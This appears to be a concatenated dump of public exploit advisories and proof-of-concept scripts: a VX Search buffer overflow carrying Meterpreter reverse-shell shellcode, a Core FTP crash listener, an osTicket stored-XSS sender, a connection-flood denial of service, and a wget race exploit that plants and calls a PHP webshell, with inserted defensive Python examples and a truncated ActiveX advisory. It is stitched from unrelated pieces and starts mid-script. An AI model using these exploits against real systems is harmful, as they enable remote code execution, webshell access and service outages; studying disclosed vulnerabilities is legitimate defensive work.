evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
#!/usr/bin/python

print "VX Search Enterprise 9.1.12 Login Buffer Overflow"
print "Author: Tulpa / tulpa[at]tulpa-security[dot]com"

#Author website: www.tulpa-security.com
#Author twitter: @tulpa_security

#Exploit will land you NT AUTHORITY\SYSTEM
#You do not need to be authenticated, password below is garbage
#Swop out IP, shellcode and remember to adjust '\x41' for bytes
#Tested on Windows 7 x86 Enterprise SP1

#Vendor has been notified on multiple occasions
#Exploit for version 9.0.26: www.exploit-db.com/exploits/40455/

#Shout-out to carbonated and ozzie_offsec

import socket
import sys

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.123.130',80))


#bad chars \x00\x0a\x0d\x26


#msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.134 LPORT=4444 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x26' -f python --smallest

#payload size 308



buf =  ""
buf += "\xdb\xdc\xb8\x95\x49\x89\x1d\xd9\x74\x24\xf4\x5f\x33"
buf += "\xc9\xb1\x47\x31\x47\x18\x83\xc7\x04\x03\x47\x81\xab"
buf += "\x7c\xe1\x41\xa9\x7f\x1a\x91\xce\xf6\xff\xa0\xce\x6d"
buf += "\x8b\x92\xfe\xe6\xd9\x1e\x74\xaa\xc9\x95\xf8\x63\xfd"
buf += "\x1e\xb6\x55\x30\x9f\xeb\xa6\x53\x23\xf6\xfa\xb3\x1a"
buf += "\x39\x0f\xb5\x5b\x24\xe2\xe7\x34\x22\x51\x18\x31\x7e"
buf += "\x6a\x93\x09\x6e\xea\x40\xd9\x91\xdb\xd6\x52\xc8\xfb"
buf += "\xd9\xb7\x60\xb2\xc1\xd4\x4d\x0c\x79\x2e\x39\x8f\xab"
buf += "\x7f\xc2\x3c\x92\xb0\x31\x3c\xd2\x76\xaa\x4b\x2a\x85"
buf += "\x57\x4c\xe9\xf4\x83\xd9\xea\x5e\x47\x79\xd7\x5f\x84"
buf += "\x1c\x9c\x53\x61\x6a\xfa\x77\x74\xbf\x70\x83\xfd\x3e"
buf += "\x57\x02\x45\x65\x73\x4f\x1d\x04\x22\x35\xf0\x39\x34"
buf += "\x96\xad\x9f\x3e\x3a\xb9\xad\x1c\x52\x0e\x9c\x9e\xa2"
buf += "\x18\x97\xed\x90\x87\x03\x7a\x98\x40\x8a\x7d\xdf\x7a"
buf += "\x6a\x11\x1e\x85\x8b\x3b\xe4\xd1\xdb\x53\xcd\x59\xb0"
buf += "\xa3\xf2\x8f\x2d\xa1\x64\xf0\x1a\xd2\xf2\x98\x58\x25"
buf += "\xeb\x04\xd4\xc3\x5b\xe5\xb6\x5b\x1b\x55\x77\x0c\xf3"
buf += "\xbf\x78\x73\xe3\xbf\x52\x1c\x89\x2f\x0b\x74\x25\xc9"
buf += "\x16\x0e\xd4\x16\x8d\x6a\xd6\x9d\x22\x8a\x98\x55\x4e"
buf += "\x98\x4c\x96\x05\xc2\xda\xa9\xb3\x69\xe2\x3f\x38\x38"
buf += "\xb5\xd7\x42\x1d\xf1\x77\xbc\x48\x8a\xbe\x28\x33\xe4"
buf += "\xbe\xbc\xb3\xf4\xe8\xd6\xb3\x9c\x4c\x83\xe7\xb9\x92"
buf += "\x1e\x94\x12\x07\xa1\xcd\xc7\x80\xc9\xf3\x3e\xe6\x55"
buf += "\x0b\x15\xf6\xaa\xda\x53\x8c\xc2\xde"


#pop pop ret 10015BBE

nseh = "\x90\x90\xEB\x0B"
seh = "\xBE\x5B\x01\x10"

egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
egghunter += "\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

evil =  "POST /login HTTP/1.1\r\n"
evil += "Host: 192.168.123.132\r\n"
evil += "User-Agent: Mozilla/5.0\r\n"
evil += "Connection: close\r\n"
evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
evil += "Accept-Language: en-us,en;q=0.5\r\n"
evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
evil += "Keep-Alive: 300\r\n"
evil += "Proxy-Connection: keep-alive\r\n"
evil += "Content-Type: application/x-www-form-urlencoded\r\n"
evil += "Content-Length: 17000\r\n\r\n"
evil += "username=admin"
evil += "&password=aaaaa\r\n"
evil += "\x41" * 13664 #subtract/add for payload
evil += "B" * 100
evil += "w00tw00t"
evil += buf
evil += "\x90" * 212
evil += nseh
evil += seh
evil += "\x90" * 10
evil += egghunter
evil += "\x90" * 8672


print 'Sending evil buffer...'
s.send(evil)
print 'Payload Sent!'
s.close()
            
[+] Credits: John Page aka hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/CORE-FTP-REMOTE-SSH-SFTP-BUFFER-OVERFLOW.txt

[+] ISR: ApparitionSec



Vendor:
===============
www.coreftp.com



Product:
========================
Core FTP LE (client)
v2.2 build 1883

Core FTP LE - free Windows software that includes the client FTP features
you need. Features like SFTP (SSH), SSL, TLS, FTPS, IDN,
browser integration, site to site transfers, FTP transfer resume, drag and
drop support, file viewing & editing, firewall support,
custom commands, FTP URL parsing, command line transfers, filters, and
much, much more.



Vulnerability Type:
================================
Remote SSH/SFTP Buffer Overflow



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

The Core FTP client is vulnerable to a remote buffer overflow denial of service when connecting
to a malicious server using the SSH/SFTP protocol.

Upon receiving an overly long string of junk in the malicious FTP server's response, Core FTP
crashes and the stack is corrupted, with several registers (EBX, EDX, EDI) overwritten, as can
be seen below.

WinDbg dump...

(d9c.16d8): Access violation - code c0000005 (first/second chance not available)
eax=035b0000 ebx=00004141 ecx=03ac7e40 edx=41414141 esi=03ac7e38 edi=41414141
eip=77313ac3 esp=0439fa10 ebp=0439fae0 iopl=0         nv up ei pl nz ac pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010216
ntdll!RtlImageNtHeader+0x92f:
77313ac3 8b12            mov     edx,dword ptr [edx]  ds:002b:41414141=????????
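As an added, defensive example (not part of hyp3rlinx's advisory and not Core FTP's code), the following Python reader shows the check a client should apply at this point: it never buffers more than the RFC 4253 limit of 255 bytes while waiting for a line terminator, so an over-long server response is rejected instead of being copied into a fixed-size buffer. `FakePeer` is a constructed stand-in for a connected socket; `MAX_LINE_BYTES`, `BoundedLineReader` and `read_identification` are names chosen for this example.

```python
# RFC 4253 section 4.2: the SSH identification string, CR LF included, is at most 255 bytes.
MAX_LINE_BYTES = 255
# Servers may send informational lines before the identification string; cap those too.
MAX_PREAMBLE_LINES = 50


class LineTooLong(ValueError):
    """Raised when the peer sends more than the permitted bytes without a line terminator."""


class BoundedLineReader:
    """Read LF-terminated lines from a peer without ever holding more than `max_len` bytes.

    `recv` is any callable that takes a byte count and returns bytes; a real
    socket's `.recv` fits, and the constructed FakePeer below stands in for one.
    """

    def __init__(self, recv, max_len=MAX_LINE_BYTES):
        self._recv = recv
        self._max_len = max_len
        self._buf = bytearray()  # bytes received but not yet returned to the caller

    def readline(self) -> bytes:
        while True:
            nl = self._buf.find(b"\n")
            if nl != -1:
                line = bytes(self._buf[: nl + 1])
                del self._buf[: nl + 1]  # keep anything after the LF for the next call
                return line
            if len(self._buf) >= self._max_len:
                raise LineTooLong("peer sent %d bytes without a line terminator" % self._max_len)
            # Never request more than the remaining budget, so the buffer is bounded by construction.
            chunk = self._recv(self._max_len - len(self._buf))
            if not chunk:
                raise ConnectionError("peer closed the connection mid-line")
            self._buf += chunk


class FakePeer:
    """Constructed stand-in for a server socket: hands out `data` in chunks of at most n bytes."""

    def __init__(self, data: bytes):
        self._data = data

    def recv(self, n: int) -> bytes:
        chunk, self._data = self._data[:n], self._data[n:]
        return chunk


def read_identification(peer_recv, max_len=MAX_LINE_BYTES):
    """Return the server's SSH identification string (without CR LF), or None if the
    server sends an over-long line, closes early, or never sends an 'SSH-' line."""
    reader = BoundedLineReader(peer_recv, max_len)
    try:
        for _ in range(MAX_PREAMBLE_LINES):
            line = reader.readline()
            if line.startswith(b"SSH-"):
                return line.rstrip(b"\r\n").decode("ascii", "replace")
            # Any other line is a pre-identification banner: ignored, but still length-bounded.
    except (LineTooLong, ConnectionError):
        return None
    return None


if __name__ == "__main__":
    print(read_identification(FakePeer(b"SSH-2.0-constructed_example\r\n").recv))
    print(read_identification(FakePeer(b"A" * 77500 + b"\r\n").recv))
```

The second call in the `__main__` block feeds the reader the same kind of input the advisory's listener produces; the reader gives up after 255 bytes and the caller sees `None`, which is the behaviour a client should have instead of the access violation in the WinDbg dump above.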




Exploit code(s):
===============

import socket

print 'hyp3rlinx - Apparition Security'
print 'Core FTP SSH/SFTP Remote Buffer Overflow / DOS\r\n'
host='127.0.0.1'

port = 22
s = socket.socket()

payload="A"*77500
s.bind((host, port))
s.listen(5)

print 'Listening on port... %i' %port
print 'Connect to me!'

while True:
    conn, addr = s.accept()
    conn.send(payload+'\r\n')
    conn.close()



Exploitation Technique:
=======================
Remote



Severity Level:
===============
High




[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.

hyp3rlinx
            
# Exploit Title: Osticket 1.9.14 and below (X-Forwarded-For) Stored XSS.
# Date: 24-11-2016
# Exploit Author: Joaquin Ramirez Martinez [ i0-SEC ]
# Software Link: http://osticket.com/
# Vendor: Osticket

"""
==============
 DESCRIPTION
==============

**osTicket** is a widely-used open source support ticket system. It seamlessly
integrates inquiries created via email, phone and web-based forms into a
simple easy-to-use multi-user web interface. Manage, organize and archive
all your support requests and responses in one place while providing your
customers with accountability and responsiveness they deserve.

(copy of Osticket - README.md)

=======================
 VULNERABILITY DETAILS
=======================

file `osticket/upload/bootstrap.php` contains this 
snippet of code (line 337-340):

  ...

if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
    // Take the left-most item for X-Forwarded-For
    $_SERVER['REMOTE_ADDR'] = trim(array_pop(
        explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])));

   ....

The $_SERVER['REMOTE_ADDR'] value gets overridden with the `X-Forwarded-For` header value.
At this point it is not yet a vulnerability, but the
file `osticket/upload/include/class.osticket.php` (lines 309-315) contains:

  ...

//Save log based on system log level settings.
        $sql='INSERT INTO '.SYSLOG_TABLE.' SET created=NOW(), updated=NOW() '
            .',title='.db_input(Format::sanitize($title, true))
            .',log_type='.db_input($loglevel[$level])
            .',log='.db_input(Format::sanitize($message, false))
            .',ip_address='.db_input($_SERVER['REMOTE_ADDR']);

        db_query($sql, false);

    ....


Every time a CSRF attack is detected (by checking the `X_CSRFTOKEN` header or the POST parameter `__CSRFToken__`),
osTicket saves the user-controlled value $_SERVER['REMOTE_ADDR'] into the database, even if it does not have a valid IP address format.

Finally, the XSS is triggered when a user who can see the system logs, such as an administrator, visits
the /scp/logs.php URI. It happens because osTicket does not encode the output of the data stored in the database.

The code responsible for launching the XSS is located in `osticket/upload/include/staff/syslogs.inc-php`,
line 142:

...
<td><?php echo $row['ip_address']; ?></td>
...

So...

An attacker can send an HTTP request with an invalid CSRF token to the login interface, carrying the XSS payload
in an `X-Forwarded-For` header, and then wait for an administrator to view the logs and trigger the XSS.
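Added example, not part of the advisory or of osTicket's code: the two-sided fix a maintainer would want, written in Python rather than PHP so it runs stand-alone. It validates the forwarded address on the way in, escapes the stored value on the way out, and flags rows already in the syslog table that hold a non-IP value. The trusted-proxy address and the sample rows are constructed.

```python
import html
import ipaddress
from typing import Dict, List, Optional, Set

# Assumption: the reverse proxies that are allowed to set X-Forwarded-For.
# A request whose TCP peer is anyone else gets its header ignored entirely.
TRUSTED_PROXIES: Set[str] = {"10.0.0.5"}


def client_ip(remote_addr: str, xff: Optional[str],
              trusted: Set[str] = TRUSTED_PROXIES) -> str:
    # Input-side fix: decide what goes into $_SERVER['REMOTE_ADDR'] (and so into
    # the ip_address column). Only honour the header when the peer is our proxy,
    # take the entry that proxy appended, and keep it only if it parses as an IP.
    if not xff or remote_addr not in trusted:
        return remote_addr
    # The last entry is the one our own proxy added; earlier ones are whatever
    # the client sent. (PHP's array_pop also returns the last element, so the
    # original snippet's "left-most" comment does not match what it does.)
    candidate = xff.split(",")[-1].strip()
    try:
        return str(ipaddress.ip_address(candidate))
    except ValueError:
        return remote_addr


def render_ip_cell(stored_value: str) -> str:
    # Output-side fix for the syslogs template: encode before interpolating into HTML.
    return "<td>%s</td>" % html.escape(stored_value, quote=True)


def suspicious_log_rows(rows: List[Dict[str, str]]) -> List[Dict[str, str]]:
    # Retro-check for an instance that ran a vulnerable version: any stored
    # ip_address that is not an IP address is a candidate injected payload.
    flagged = []
    for row in rows:
        try:
            ipaddress.ip_address(row["ip_address"])
        except ValueError:
            flagged.append(row)
    return flagged


# Constructed sample rows in the shape of the SYSLOG_TABLE insert above.
SAMPLE_ROWS = [
    {"log_id": "1", "title": "Invalid CSRF Token", "ip_address": "203.0.113.9"},
    {"log_id": "2", "title": "Invalid CSRF Token", "ip_address": "<b>not an ip</b>"},
    {"log_id": "3", "title": "Mailer error", "ip_address": "2001:db8::1"},
]

if __name__ == "__main__":
    print(client_ip("10.0.0.5", "198.51.100.20, 203.0.113.9"))
    for row in suspicious_log_rows(SAMPLE_ROWS):
        print("row %s needs cleanup: %s" % (row["log_id"], render_ip_cell(row["ip_address"])))
```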


================
  DEMONSTRATION
================

Demo video: https://www.youtube.com/watch?v=lx_WlL89F70

The demo also shows a low-severity XSS vulnerability in the helpdesk name/title of osTicket.


================
  REFERENCES
================

https://github.com/osTicket/osTicket/releases
https://github.com/osTicket/osTicket/releases/tag/v1.9.15

X-Forwarded-For XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/4396f91cdc990b7da598a7562eb634b89314b631

helpdesk name/title XSS:

https://github.com/osTicket/osTicket/pull/3439
https://github.com/osTicket/osTicket/commit/2fb47bd84d1905b49beab05fcf3f01b00a171c37

================
  MITIGATIONS
================

Update to version 1.9.15 or later.

================
  CREDITS
================

Vulnerability discovered by Joaquin Ramirez Martinez
  
  https://www.youtube.com/channel/UCe1Ex2Y0wD71I_cet-Wsu7Q/videos
  https://twitter.com/rammarj

================
  TIMELINE
================

13-07-2016 - Vulnerability found
19-09-2016 - Osticket informed of the flaws
01-11-2016 - Osticket patches vulnerabilities (v1.9.15 released)
24-11-2016 - Public disclosure.


"""
import urllib
import urllib2
from optparse import OptionParser

options = OptionParser(usage='python %prog [options]', description='Stored XSS')
options.add_option('-t', '--target', type='string', default='http://localhost', help='(required) example: http://localhost')
options.add_option('-p', '--path', type='string', default='/', help='osticket path. Default: /')
options.add_option('-x', '--payload', type='string', default='<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>'
  , help='xss payload. Default: "<svg/onload=alert(/Osticket_XSSed_by_i0-sec/)>"')

banner = """ 

======================================================   
                       OSTICKET 
  "The most popular ticketing system in the world"
                      Stored XSS

            by i0-sec (Joaquin R. M.)
======================================================

"""

def main():
    opts,args = options.parse_args()    
    print(banner)
    server = opts.target
    path = opts.path
    body = urllib.urlencode({"__CSRFToken__":"invalid", "do":"scplogin", "userid":"invalid", "passwd":"invalid", "submit":""})    
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36",
    "Content-type": "application/x-www-form-urlencoded", "X-Forwarded-For": opts.payload}
    url = server+path+"/scp/login.php" #default login interface URI for OSTICKET
    print('[+] Connecting to '+server+path)
    req = urllib2.Request(url, body, headers)
    try:
      print('[+] Sending payload... ')
      response = urllib2.urlopen(req)
      html = response.read()
    except Exception, e:
      pass
    print '[+] Payload sent.'
    print '[+] Completed.\n'

if __name__ == '__main__':
    main()
            
# Exploit Title: Remote Utilities - Host 6.3 - Denial of Service
# Date: 2016-11-25
# Exploit Author: Peter Baris
# Vendor Homepage: www.remoteutilities.com 
# Software Link: http://saptech-erp.com.au/resources/executables/host6.3.zip
# Version: 6.3.0.6 - (other versions below 6.5 beta 3 are also affected)
# Tested on: Windows 7 SP1 x64 and Windows Server 2008 R2
# After the notification, the company released a fix in version 6.5 beta 3
# On Windows 7 the software refuses connections after execution.
# On Windows 2008 R2 it caused 100% CPU usage and an occasional server crash when 1 core was assigned


#!/usr/bin/python
import socket
counter=0

while (counter <= 5000):	
	counter=counter+1
	print(counter)
	s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connect=s.connect(('<host address>',5650))
	s.close()
            
'''
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

- CVE-2016-7098
- Release date: 24.11.2016
- Revision 1.0
- Severity: Medium
=============================================


I. VULNERABILITY
-------------------------

GNU Wget < 1.18       Access List Bypass / Race Condition


II. BACKGROUND
-------------------------

"GNU Wget is a free software package for retrieving files using HTTP, HTTPS and 
FTP, the most widely-used Internet protocols. 
It is a non-interactive commandline tool, so it may easily be called from 
scripts, cron jobs, terminals without X-Windows support, etc.

GNU Wget has many features to make retrieving large files or mirroring entire 
web or FTP sites easy
"

https://www.gnu.org/software/wget/


III. INTRODUCTION
-------------------------

GNU wget in version 1.17 and earlier, when used in mirroring/recursive mode, 
is affected by a Race Condition vulnerability that might allow remote attackers 
to bypass intended wget access list restrictions specified with -A parameter.
This might allow attackers to place malicious/restricted files onto the system. 
Depending on the application / download directory, this could potentially lead 
to other vulnerabilities such as code execution etc.


IV. DESCRIPTION
-------------------------

When wget is used in recursive/mirroring mode, according to the manual it can 
take the following access list options:

"Recursive Accept/Reject Options:
  -A acclist --accept acclist
  -R rejlist --reject rejlist

Specify comma-separated lists of file name suffixes or patterns to accept or 
reject. Note that if any of the wildcard characters, *, ?, [ or ], appear in 
an element of acclist or rejlist, it will be treated as a pattern, rather 
than a suffix."


These can for example be used to only download JPG images. 

It was however discovered that when a single file is requested with recursive 
option (-r / -m) and an access list ( -A ), wget only applies the checks at the
end of the download process. 

This can be observed in the output below:

# wget -r -nH -A '*.jpg' http://attackersvr/test.php
Resolving attackersvr... 192.168.57.1
Connecting to attackersvr|192.168.57.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/plain]
Saving to: ‘test.php’

15:05:46 (27.3 B/s) - ‘test.php’ saved [52]

Removing test.php since it should be rejected.

FINISHED


Although wget deletes the file at the end of the download process, this creates 
a race condition as an attacker with control over the URL/remote server could 
intentionally slow down the download process so that they had a chance to make 
use of the malicious file before it gets deleted.

It is very easy to win the race as the file only gets deleted after the HTTP 
connection is terminated. The attacker could therefore keep the connection open 
as long as it was necessary to make use of the uploaded file as demonstrated
in the proof of concept below.


V. PROOF OF CONCEPT EXPLOIT
------------------------------


Here is a simple vulnerable PHP web application that uses wget to download 
images from a user-provided server/URL:


---[ image_importer.php ]---

<?php
        // Vulnerable webapp [image_importer.php]
        // Uses wget to import user images from provided site URL 
        // It only accepts JPG files (-A wget option).

        if ( isset($_GET['imgurl']) ) {
                $URL = escapeshellarg($_GET['imgurl']);
        } else {
                die("imgurl parameter missing");
        }

        if ( !file_exists("image_uploads") ) {
                mkdir("image_uploads");
        }

        // Download user JPG images into /image_uploads directory
        system("wget -r -nH -P image_uploads -A '*.jpg' $URL 2>&1");
?>


----------------------------


For example:
https://victimsvr/image_importer.php?imgurl=http://images/logo.jpg

will cause wget to store the logo.jpg file on the victim server at:
https://victimsvr/image_uploads/logo.jpg

The wget access list (-A) is to ensure that only .jpg files get uploaded.

However due to the wget race condition vulnerability an attacker could use 
the exploit below to upload an arbitrary PHP script to /image_uploads directory
and achieve code execution.
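Added example, not part of the advisory or of the vulnerable importer: a Python replacement for the image_importer.php pattern that does not depend on wget's end-of-download rejection. It assumes a staging directory outside the web root on the same filesystem as the served directory; the wget command line is only built, not run, and the files in demo() are constructed.

```python
import os
import re
import shutil
import tempfile
from typing import List
from urllib.parse import urlsplit

ACCEPT_SUFFIXES = (".jpg", ".jpeg")
JPEG_MAGIC = b"\xff\xd8\xff"          # JPEG starts with the SOI marker FF D8, then FF
MAX_BYTES = 5 * 1024 * 1024
SAFE_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")


def wget_argv(url: str, staging_dir: str) -> List[str]:
    # Same wget options as the advisory's importer, with two changes: only
    # http(s) URLs are passed through, and -P points at a directory that the
    # web server never serves, so nothing wget writes is reachable by a client.
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("only http(s) URLs are accepted: %r" % url)
    return ["wget", "-r", "-nH", "-P", staging_dir, "-A", "*.jpg", "--", url]


def looks_like_jpeg(path: str) -> bool:
    # Content check that does not trust the name wget chose for the file.
    try:
        if os.path.getsize(path) > MAX_BYTES:
            return False
        with open(path, "rb") as fh:
            return fh.read(len(JPEG_MAGIC)) == JPEG_MAGIC
    except OSError:
        return False


def publish_staged(staging_dir: str, uploads_dir: str) -> List[str]:
    # Enforce the accept list ourselves, on suffix and on content, after wget
    # has exited and before anything is moved under the web root. Files that
    # fail are deleted here; the race in the advisory cannot occur because a
    # rejected file was never at a URL a client could request.
    os.makedirs(uploads_dir, exist_ok=True)
    published = []
    for root, _dirs, files in os.walk(staging_dir):
        for name in files:
            src = os.path.join(root, name)
            accepted = (name.lower().endswith(ACCEPT_SUFFIXES)
                        and SAFE_NAME.fullmatch(name) is not None
                        and looks_like_jpeg(src))
            if accepted:
                dst = os.path.join(uploads_dir, name)
                os.replace(src, dst)   # atomic rename: same filesystem assumed
                published.append(dst)
            else:
                os.remove(src)
    return published


def demo() -> dict:
    # Constructed sample: three staged files, only one of which is a real JPEG.
    base = tempfile.mkdtemp(prefix="wget-importer-")
    staging = os.path.join(base, "staging")               # outside the web root
    uploads = os.path.join(base, "www", "image_uploads")  # the served directory
    os.makedirs(staging)
    samples = {
        "logo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,  # JPEG/JFIF header bytes
        "fake.jpg": b"<?php echo 1; ?>",                 # .jpg name, PHP content
        "script.php": b"<?php echo 2; ?>",               # the case the PoC relies on
    }
    for name, data in samples.items():
        with open(os.path.join(staging, name), "wb") as fh:
            fh.write(data)
    published = [os.path.basename(p) for p in publish_staged(staging, uploads)]
    result = {"published": published,
              "served": sorted(os.listdir(uploads)),
              "left_in_staging": os.listdir(staging)}
    shutil.rmtree(base)
    return result


if __name__ == "__main__":
    print(" ".join(wget_argv("http://images.example/logo.jpg", "/srv/staging")))
    print(demo())
```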


---[ wget-race-exploit.py ]---
'''

#!/usr/bin/env python

#
# Wget < 1.18  Access List Bypass / Race Condition PoC Exploit
# CVE-2016-7098
#
# Dawid Golunski
# https://legalhackers.com
#
#
# This PoC wget exploit can be used to bypass wget -A access list and upload a malicious
# file for long enough to take advantage of it.
# The exploit sets up a web server on port 80 and waits for a download request from wget.
# It then supplies a PHP webshell payload and requests the uploaded file before it gets
# removed by wget. 
#
# Adjust target URL (WEBSHELL_URL) before executing.
# 
# Full advisory at:
#
# https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html
#
# Disclaimer:
#
# For testing purposes only. Do no harm.
#
# 

import SimpleHTTPServer
import time
import SocketServer
import urllib2
import sys

HTTP_LISTEN_IP = '0.0.0.0'
HTTP_LISTEN_PORT = 80

PAYLOAD='''
<?php
	//our webshell
	system($_GET["cmd"]);
	system("touch /tmp/wgethack");
?>
'''

# Webshell URL to be requested before the connection is closed 
# i.e before the uploaded "temporary" file gets removed.
WEBSHELL_URL="http://victimsvr/image_uploads/webshell.php"

# Command to be executed through 'cmd' GET paramter of the webshell
CMD="/usr/bin/id"


class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # Send the payload on GET request
       print "[+] Got connection from wget requesting " + self.path + " via GET :)\n"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(PAYLOAD)
       print "\n[+] PHP webshell payload was sent.\n"

       # Wait for the file to be flushed to disk on remote host etc.
       print "[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...\n"
       time.sleep(2)

       # Request uploaded webshell
       print "[+} File '" + self.path + "' should be saved by now :)\n"
       print "[+} Executing " + CMD + " via webshell URL: " + WEBSHELL_URL + "?cmd=" + CMD + "\n"
       print "[+} Command result: "
       print urllib2.urlopen(WEBSHELL_URL+"?cmd="+CMD).read()

       print "[+} All done. Closing HTTP connection...\n"
       # Connection will be closed on request handler return
       return

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "\nWget < 1.18 Access List Bypass / Race Condition PoC Exploit \nCVE-2016-7098\n\nDawid Golunski \nhttps://legalhackers.com \n"
print "[+} Exploit Web server started on HTTP port %s. Waiting for wget to connect...\n" % HTTP_LISTEN_PORT

handler.serve_forever()

'''
------------------------------

If the attacker runs this exploit on their server ('attackersvr') and points
the vulnerable script image_importer.php at it via the URL:

https://victimsvr/image_importer.php?imgurl=http://attackersvr/webshell.php

the attacker will see output similar to:



root@attackersvr:~# ./wget-race-exploit.py 

Wget < 1.18 Access List Bypass / Race Condition PoC Exploit 
CVE-2016-7098

Dawid Golunski 
https://legalhackers.com 

[+} Exploit Web server started on HTTP port 80. Waiting for wget to connect...

[+] Got connection from wget requesting /webshell.php via GET :)

victimsvr - - [24/Nov/2016 00:46:18] "GET /webshell.php HTTP/1.1" 200 -

[+] PHP webshell payload was sent.

[+} Sleep for 2s to make sure the file has been flushed to the disk on the target...

[+} File '/webshell.php' should be saved by now :)

[+} Executing /usr/bin/id via webshell URL: http://victimsvr/image_uploads/webshell.php?cmd=/usr/bin/id

[+} Command result: 

uid=33(www-data) gid=33(www-data) groups=33(www-data),1002(nagcmd)

[+} All done. Closing HTTP connection...



VI. BUSINESS IMPACT
-------------------------

The vulnerability might allow remote servers to bypass intended wget access list 
restrictions to temporarily store a malicious file on the server. 
In certain cases, depending on the context the wget command was used in and the
download path, this issue could potentially lead to other vulnerabilities such as
script execution, as shown in the PoC section.
 
VII. SYSTEMS AFFECTED
-------------------------

Wget < 1.18
 
VIII. SOLUTION
-------------------------

Update to the latest version of wget (1.18) or apply the patches provided by the vendor.
 
IX. REFERENCES
-------------------------

https://legalhackers.com

https://legalhackers.com/advisories/Wget-Exploit-ACL-bypass-RaceCond-CVE-2016-7098.html

https://legalhackers.com/exploits/CVE-2016-7098/wget-race-exploit.py

https://www.gnu.org/software/wget/

https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7098

https://security-tracker.debian.org/tracker/CVE-2016-7098

http://lists.opensuse.org/opensuse-updates/2016-09/msg00044.html

http://lists.gnu.org/archive/html/bug-wget/2016-08/msg00124.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7098


X. CREDITS
-------------------------

The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com

https://legalhackers.com
 
XI. REVISION HISTORY
-------------------------

24.11.2016 - Advisory released
 
XII. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
'''
            
UCanCode multiple vulnerabilities

Url: http://www.hmi-software.com/
     http://www.ucancode.net/index.htm
     http://www.ucancode.net/bbs/zhuce/login.htm

Description: From the vendor's web page: "UCanCode Software is a Market Leading provider of HMI & SCADA, CAD, UML, GIS, Vector Graphics
             and Real Time Data Visualization Graphics Source Code Kits for C/C++ and .NET software developers more than 40 countries
             around the world!"
             Great... 40 countries. It's time to take a look at their software!
             Package name: "UCanCode_Controls.zip"
             After the installation, we can find these ActiveX controls:

             ---------------------------------------------
             ProgID: UCCVIEWER.UCCViewerCtrl.1
             CLSID: {3B7B3C36-8515-4E15-BC46-D1BEBA2F360C}
             ---------------------------------------------
             ProgID: UCCDRAW.UCCDrawCtrl.1
             CLSID: {4B5BEE59-EDD2-4082-A9F7-D65E1CA20FA7}
             ---------------------------------------------
             progID: TKDRAWCAD.TKDrawCADCtrl.1
             CLSID: {9022B790-B810-45B4-80BC-2D94EEC5343C}
             ---------------------------------------------
             ProgID: UCCPRINT.UCCPrintCtrl.1
             CLSID: {A4FCBD44-6BF5-405C-9598-C8E8ADCE4488}
             ---------------------------------------------
             ProgID: UCCDIAGRAM.UCCDiagramCtrl.1
             CLSID: {B6A3BF2C-F770-4182-BE7F-103BF2C76826}
             ---------------------------------------------
             ProgID: UCCUML.UCCUMLCtrl.1
             CLSID: {C1F0EE85-363F-483D-97D0-87E2A537BFBA}
             ---------------------------------------------
             ProgID: UCCHMI.UCCHMICtrl.1
             CLSID: {EDBBC1DC-58B2-4404-85FD-F9B1C05D96EF}
             ---------------------------------------------
